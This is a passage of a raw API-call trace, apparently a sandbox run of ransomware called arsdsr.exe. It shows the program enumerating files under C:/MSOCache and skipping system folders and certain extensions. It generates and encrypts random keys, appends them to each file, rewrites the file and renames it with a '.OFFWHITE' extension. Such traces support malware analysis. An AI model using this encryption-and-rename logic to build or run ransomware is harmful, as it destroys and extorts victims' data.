dwReserved1=0x295e9f0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2=".") returned 1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="..") returned 1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="...") returned 1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="windows") returned -1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="$recycle.bin") returned 1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="rsa") returned -1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="ntuser.dat") returned -1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="programdata") returned -1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="appdata") returned 1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="program files") returned -1 [0085.992] lstrcmpiW (lpString1="dwintl20.dll", lpString2="program files (x86)") returned -1 [0085.992] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\" [0085.992] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpString2="dwintl20.dll" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" [0085.992] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.992] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.992] PathFindExtensionW (pszPath="dwintl20.dll") returned=".dll" [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0085.992] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0085.992] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 0 [0085.992] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0085.993] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2=".") returned 1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="..") returned 1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="...") returned 1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="windows") returned -1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="$recycle.bin") returned 1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="rsa") returned -1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="ntuser.dat") returned -1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="programdata") returned -1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="appdata") returned 1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="program files") returned -1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="program files (x86)") returned -1 [0085.993] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0085.993] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="branding.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" [0085.993] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.993] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.993] PathFindExtensionW (pszPath="branding.xml") returned=".xml" [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0085.993] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0085.993] lstrcmpiW (lpString1="branding.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0085.994] GetProcessHeap () returned 0x500000 [0085.994] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c48 [0085.994] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0085.994] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=596341) returned 1 [0085.994] GetProcessHeap () returned 0x500000 [0085.994] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0085.995] GetProcessHeap () returned 0x500000 [0085.995] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0085.995] GetProcessHeap () returned 0x500000 [0085.995] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0085.995] GetProcessHeap () returned 0x500000 [0085.995] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0085.995] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.995] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.995] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0085.995] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.995] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.995] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0085.995] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.995] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.995] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0085.995] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.995] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.995] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0085.995] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x91975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.996] SetLastError (dwErrCode=0x0) [0085.996] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.032] GetLastError () returned 0x0 [0086.032] GetLastError () returned 0x0 [0086.032] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x91a75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.032] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.032] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x91b75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.032] WriteFile (in: hFile=0x21c, lpBuffer=0x547c48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c48*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.032] GetProcessHeap () returned 0x500000 [0086.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x91975) returned 0x2960020 [0086.032] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.032] ReadFile (in: hFile=0x21c, lpBuffer=0x2960020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295e540*=0x91975, lpOverlapped=0x0) returned 1 [0086.116] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.116] WriteFile (in: hFile=0x21c, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0x91975, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295e54c*=0x91975, lpOverlapped=0x0) returned 1 [0086.118] GetProcessHeap () returned 0x500000 [0086.118] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0086.126] CloseHandle (hObject=0x21c) returned 1 [0086.131] GetProcessHeap () returned 0x500000 [0086.131] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.131] GetProcessHeap () returned 0x500000 [0086.131] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.131] GetProcessHeap () returned 0x500000 [0086.131] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.131] GetProcessHeap () returned 0x500000 [0086.131] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.131] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" [0086.131] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.OFFWHITE" [0086.131] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.offwhite")) returned 1 [0086.132] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2=".") returned 1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="..") returned 1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="...") returned 1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="windows") returned -1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="$recycle.bin") returned 1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="rsa") returned -1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="ntuser.dat") returned -1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="programdata") returned -1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="appdata") returned 1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="program files") returned -1 [0086.132] lstrcmpiW (lpString1="DW20.EXE", lpString2="program files (x86)") returned -1 [0086.132] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.132] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="DW20.EXE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" [0086.132] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.132] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.132] PathFindExtensionW (pszPath="DW20.EXE") returned=".EXE" [0086.132] lstrcmpiW (lpString1=".EXE", lpString2=".exe") returned 0 [0086.132] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2=".") returned 1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="..") returned 1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="...") returned 1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="windows") returned -1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="$recycle.bin") returned 1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="rsa") returned -1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="ntuser.dat") returned -1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="programdata") returned -1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="appdata") returned 1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="program files") returned -1 [0086.133] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="program files (x86)") returned -1 [0086.133] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.133] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="dwdcw20.dll" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" [0086.133] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.133] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.133] PathFindExtensionW (pszPath="dwdcw20.dll") returned=".dll" [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0086.133] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0086.133] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2=".") returned 1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="..") returned 1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="...") returned 1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="windows") returned -1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="$recycle.bin") returned 1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="rsa") returned -1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="ntuser.dat") returned -1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="programdata") returned -1 [0086.133] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="appdata") returned 1 [0086.134] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="program files") returned -1 [0086.134] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="program files (x86)") returned -1 [0086.134] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.134] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="dwtrig20.exe" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" [0086.134] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.134] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.134] PathFindExtensionW (pszPath="dwtrig20.exe") returned=".exe" [0086.134] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0086.134] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2=".") returned 1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="..") returned 1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="...") returned 1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="windows") returned -1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="$recycle.bin") returned 1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="rsa") returned -1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="ntuser.dat") returned -1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="programdata") returned -1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="appdata") returned 1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="program files") returned -1 [0086.134] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="program files (x86)") returned -1 [0086.134] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.134] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="Microsoft.VC90.CRT.manifest" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" [0086.134] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.134] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.134] PathFindExtensionW (pszPath="Microsoft.VC90.CRT.manifest") returned=".manifest" [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".exe") returned 1 [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".log") returned 1 [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".cab") returned 1 [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".cmd") returned 1 [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".com") returned 1 [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".cpl") returned 1 [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".ini") returned 1 [0086.134] lstrcmpiW (lpString1=".manifest", lpString2=".dll") returned 1 [0086.135] lstrcmpiW (lpString1=".manifest", lpString2=".url") returned -1 [0086.135] lstrcmpiW (lpString1=".manifest", lpString2=".ttf") returned -1 [0086.135] lstrcmpiW (lpString1=".manifest", lpString2=".mp3") returned -1 [0086.135] lstrcmpiW (lpString1=".manifest", lpString2=".pif") returned -1 [0086.135] lstrcmpiW (lpString1=".manifest", lpString2=".mp4") returned -1 [0086.135] lstrcmpiW (lpString1=".manifest", lpString2=".OFFWHITE") returned -1 [0086.135] lstrcmpiW (lpString1=".manifest", lpString2=".msi") returned -1 [0086.135] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0086.135] GetProcessHeap () returned 0x500000 [0086.135] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c58 [0086.135] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.137] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1857) returned 1 [0086.137] GetProcessHeap () returned 0x500000 [0086.137] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.137] GetProcessHeap () returned 0x500000 [0086.137] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.137] GetProcessHeap () returned 0x500000 [0086.137] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.137] GetProcessHeap () returned 0x500000 [0086.137] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.137] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.137] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.137] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.137] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.137] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.137] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.137] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.137] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.137] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, 